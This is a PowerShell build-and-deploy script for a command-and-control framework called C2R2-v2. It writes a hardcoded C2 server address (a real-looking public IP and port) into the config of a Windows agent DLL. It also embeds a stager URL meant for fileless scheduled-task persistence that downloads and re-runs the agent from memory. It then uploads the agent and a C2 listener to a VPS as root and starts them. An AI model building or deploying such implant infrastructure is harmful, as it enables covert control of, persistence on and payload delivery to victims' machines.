#!/usr/bin/env pwsh
# deploy.ps1 - Build all C2R2 components and deploy to VPS
#
# Builds:
#   1. agent.dll   (Windows cdylib, MSVC x86_64) -> uploaded to VPS dist/
#   2. c2r2-server (Linux x86_64, via WSL)       -> replaces VPS binary
# Then:
#   3. SCP artifacts to VPS via SSH
#   4. Restart c2r2-server on VPS
#
# Usage:
#   .\deploy.ps1
#   .\deploy.ps1 -Ip 45.154.98.72 -Port 4444 -ApiPort 5555
#   .\deploy.ps1 -SkipAgent     # rebuild only server
#   .\deploy.ps1 -SkipServer    # rebuild only agent

param(
    [string]$Ip        = "45.154.98.72",
    [int]   $Port      = 4444,
    [int]   $ApiPort   = 5555,
    [string]$VpsUser   = "root",
    [string]$VpsDir    = "~/c2r2",
    [switch]$SkipAgent,
    [switch]$SkipServer,
    [switch]$Production
)

$ErrorActionPreference = "Stop"
$RepoRoot = $PSScriptRoot
$DistDir  = Join-Path $RepoRoot "dist"

function Step([string]$msg) {
    Write-Host ""
    Write-Host $msg -ForegroundColor Yellow
    Write-Host ("-" * 60) -ForegroundColor DarkGray
}

function Die([string]$msg) {
    Write-Host "FATAL: $msg" -ForegroundColor Red
    exit 1
}

Write-Host ""
Write-Host "#=====================================================" -ForegroundColor Cyan
Write-Host "#  C2R2-v2  Deploy to VPS                           " -ForegroundColor Cyan
Write-Host "#=====================================================" -ForegroundColor Cyan
Write-Host "  Target  : ${VpsUser}@${Ip}"
Write-Host "  VPS Dir : $VpsDir"
Write-Host "  C2      : ${Ip}:${Port}  API:${ApiPort}"
Write-Host ""

New-Item -ItemType Directory -Path $DistDir -Force | Out-Null

# ---------------------------------------------------------------------------
# [1] Build agent.dll (Windows cdylib, MSVC)
# ---------------------------------------------------------------------------
if (-not $SkipAgent) {
    Step "[1/3] Building agent.dll (Windows x64 cdylib, MSVC)"

    # Write config.rs with C2 server address (must match exact format with 96-byte padded marker)
    $addr = "${Ip}:${Port}"
    # marker = 32 bytes, addr fills after, rest is \0 padding to total 96 bytes
    $marker       = "C2R2_SERVER_ADDRESS_PLACEHOLDER_"   # exactly 32 chars
    $paddingCount = 96 - $marker.Length - $addr.Length
    if ($paddingCount -lt 0) { Die "C2 address too long for 96-byte padded static" }
    $nullPad      = '\0' * $paddingCount
    $configContent  = "// Auto-generated by deploy.ps1`n"
    $configContent += "#[used]`n#[no_mangle]`n"
    $configContent += "pub static C2_SERVER_PADDED: &[u8; 96] = b`"${marker}${addr}${nullPad}`";`n`n"
    $configContent += "pub fn get_c2_server() -> &'static str {`n"
    $configContent += "    let without_marker = &C2_SERVER_PADDED[32..];`n"
    $configContent += "    let str_slice = std::str::from_utf8(without_marker).unwrap_or(`"`");`n"
    $configContent += "    str_slice.trim_end_matches('`\0')`n"
    $configContent += "}`n`n"
    $configContent += "pub const C2_SERVER: &str = `"${addr}`";`n"
    $stagerUrl = "http://${Ip}:${ApiPort}/api/stage0/ester"
    $configContent += "`n/// URL from which the stager (ester.exe) is served by the C2 server.`n"
    $configContent += "/// Used by fileless scheduled-task persistence to download & re-exec the agent from memory.`npub const STAGER_URL: &str = `"${stagerUrl}`";`n"
    [System.IO.File]::WriteAllText("$RepoRoot\agent\src\config.rs", $configContent)
    Write-Host "  config.rs -> ${Ip}:${Port}" -ForegroundColor DarkGray

    # Build agent DLL
    Push-Location $RepoRoot
    $agentArgs = @("build", "--release", "--package", "agent", "--lib", "--target", "x86_64-pc-windows-msvc")
    if ($Production) {
        $agentArgs += "--no-default-features"
        $agentArgs += "--features"; $agentArgs += "production"
    }

    Write-Host "  cargo $($agentArgs -join ' ')" -ForegroundColor DarkGray
    & cargo @agentArgs
    if ($LASTEXITCODE -ne 0) { Pop-Location; Die "agent.dll build failed" }
    Pop-Location

    $agentDllSrc = Join-Path $RepoRoot "target\x86_64-pc-windows-msvc\release\agent_dll.dll"
    if (-not (Test-Path $agentDllSrc)) {
        Die "agent_dll.dll not found at $agentDllSrc"
    }

    # Copy as agent.dll in dist (server looks for dist/agent.dll)
    Copy-Item $agentDllSrc (Join-Path $DistDir "agent.dll") -Force
    $dllKB = [math]::Round((Get-Item (Join-Path $DistDir "agent.dll")).Length / 1KB, 1)
    Write-Host "  -> dist\agent.dll : $dllKB KB" -ForegroundColor Green
} else {
    Write-Host "[1/3] Skipping agent build (-SkipAgent)" -ForegroundColor DarkGray
}

# ---------------------------------------------------------------------------
# [2] Build c2r2-server (Linux x86_64 via WSL)
# ---------------------------------------------------------------------------
if (-not $SkipServer) {
    Step "[2/3] Building c2r2-server (Linux x86_64 via WSL)"

    # Convert Windows path to WSL path  (works in PS5 + PS7)
    $driveLetter = $RepoRoot[0].ToString().ToLower()
    $wslRepoRoot = "/mnt/$driveLetter" + ($RepoRoot.Substring(2) -replace '\\', '/')

    Write-Host "  WSL path : $wslRepoRoot" -ForegroundColor DarkGray
    Write-Host "  cargo build --release --package c2r2-server --target x86_64-unknown-linux-gnu" -ForegroundColor DarkGray

    wsl bash -c "source ~/.cargo/env && cd '$wslRepoRoot' && cargo build --release --package c2r2-server --target x86_64-unknown-linux-gnu 2>&1" | ForEach-Object {
        if ($_ -match "error\[|^error") { Write-Host "  $_" -ForegroundColor Red }
        elseif ($_ -match "^warning") { Write-Host "  $_" -ForegroundColor DarkYellow }
        elseif ($_ -match "Compiling|Finished") { Write-Host "  $_" -ForegroundColor DarkGreen }
    }
    if ($LASTEXITCODE -ne 0) { Die "c2r2-server WSL build failed (exit $LASTEXITCODE)" }

    $serverBin = Join-Path $RepoRoot "target\x86_64-unknown-linux-gnu\release\c2r2-server"
    if (-not (Test-Path $serverBin)) {
        Die "c2r2-server binary not found at $serverBin"
    }

    Copy-Item $serverBin (Join-Path $DistDir "c2r2-server-x86_64") -Force
    $srvMB = [math]::Round((Get-Item (Join-Path $DistDir "c2r2-server-x86_64")).Length / 1MB, 1)
    Write-Host "  -> dist\c2r2-server-x86_64 : $srvMB MB" -ForegroundColor Green
} else {
    Write-Host "[2/3] Skipping server build (-SkipServer)" -ForegroundColor DarkGray
}

# ---------------------------------------------------------------------------
# [3] Deploy to VPS via SCP + SSH
# ---------------------------------------------------------------------------
Step "[3/3] Deploying to ${VpsUser}@${Ip}:${VpsDir}"

# Verify SSH connectivity
Write-Host "  Testing SSH..." -ForegroundColor DarkGray
$sshTest = & ssh -o ConnectTimeout=8 -o BatchMode=yes "${VpsUser}@${Ip}" "echo ok" 2>&1
if ($LASTEXITCODE -ne 0) { Die "SSH connection to ${VpsUser}@${Ip} failed: $sshTest" }
Write-Host "  SSH OK" -ForegroundColor Green

# Stop running server
Write-Host "  Stopping running c2r2-server (if any)..." -ForegroundColor DarkGray
& ssh "${VpsUser}@${Ip}" "pkill -f 'c2r2-server' 2>/dev/null; sleep 1; echo stopped"

# Upload server binary
if (-not $SkipServer) {
    Write-Host "  Uploading c2r2-server..." -ForegroundColor DarkGray
    & scp (Join-Path $DistDir "c2r2-server-x86_64") "${VpsUser}@${Ip}:${VpsDir}/c2r2-server"
    if ($LASTEXITCODE -ne 0) { Die "scp c2r2-server failed" }
    & ssh "${VpsUser}@${Ip}" "chmod +x ${VpsDir}/c2r2-server"
    Write-Host "  -> c2r2-server uploaded + chmod +x" -ForegroundColor Green
}

# Upload agent.dll
if (-not $SkipAgent) {
    Write-Host "  Uploading agent.dll..." -ForegroundColor DarkGray
    & scp (Join-Path $DistDir "agent.dll") "${VpsUser}@${Ip}:${VpsDir}/dist/agent.dll"
    if ($LASTEXITCODE -ne 0) { Die "scp agent.dll failed" }
    $remoteSize = & ssh "${VpsUser}@${Ip}" "stat -c%s ${VpsDir}/dist/agent.dll"
    Write-Host "  -> dist/agent.dll : $([math]::Round($remoteSize/1KB,1)) KB" -ForegroundColor Green
}

# Start the server detached with nohup (no TTY required; use tmux manually if
# you need the interactive rustyline CLI: tmux attach -t c2r2)
Write-Host ""
Write-Host "  Starting c2r2-server on VPS (nohup detached)..." -ForegroundColor DarkGray

# Kill any existing session / old process
& ssh "${VpsUser}@${Ip}" "tmux kill-session -t c2r2 2>/dev/null; pkill -f 'c2r2-server' 2>/dev/null; sleep 1"

$startCmd = "mkdir -p ${VpsDir}/logs && nohup ${VpsDir}/c2r2-server --bind 0.0.0.0 --port ${Port} --api-port ${ApiPort} >> ${VpsDir}/logs/server.log 2>&1 &"
& ssh "${VpsUser}@${Ip}" $startCmd
Start-Sleep 4

# Verify it's running
$pidCheck = & ssh "${VpsUser}@${Ip}" "pgrep -la c2r2-server 2>/dev/null"
if ($LASTEXITCODE -eq 0 -and $pidCheck) {
    Write-Host "  c2r2-server running: $pidCheck" -ForegroundColor Green
} else {
    Write-Host "  WARNING: c2r2-server may not have started" -ForegroundColor Red
    & ssh "${VpsUser}@${Ip}" "tail -20 ${VpsDir}/logs/server.log 2>/dev/null"
}

# Verify ports listening
$ports = & ssh "${VpsUser}@${Ip}" "ss -tlnp 2>/dev/null | grep -E ':${Port}|:${ApiPort}'"
if ($ports) {
    Write-Host "  Ports listening:" -ForegroundColor Green
    $ports | ForEach-Object { Write-Host "    $_" }
}

# ---------------------------------------------------------------------------
# Summary
# ---------------------------------------------------------------------------
Write-Host ""
Write-Host "#=====================================================" -ForegroundColor Green
Write-Host "#  DEPLOY COMPLETE                                   " -ForegroundColor Green
Write-Host "#=====================================================" -ForegroundColor Green
Write-Host ""
Write-Host "  VPS    : ${VpsUser}@${Ip}" -ForegroundColor White
Write-Host "  Beacon : ${Ip}:${Port}  (TLS, agent connects here)" -ForegroundColor White
Write-Host "  API    : http://${Ip}:${ApiPort}  (team-client, stage0 DLL download)" -ForegroundColor White
Write-Host ""
Write-Host "Last 5 log lines:" -ForegroundColor Cyan
& ssh "${VpsUser}@${Ip}" "tail -5 ${VpsDir}/logs/server.log 2>/dev/null || echo '(no log yet)'"
Write-Host ""
Write-Host "Tip: attach to server console with:" -ForegroundColor DarkGray
Write-Host "  ssh ${VpsUser}@${Ip} -t 'tmux attach -t c2r2'" -ForegroundColor DarkGray
Write-Host ""
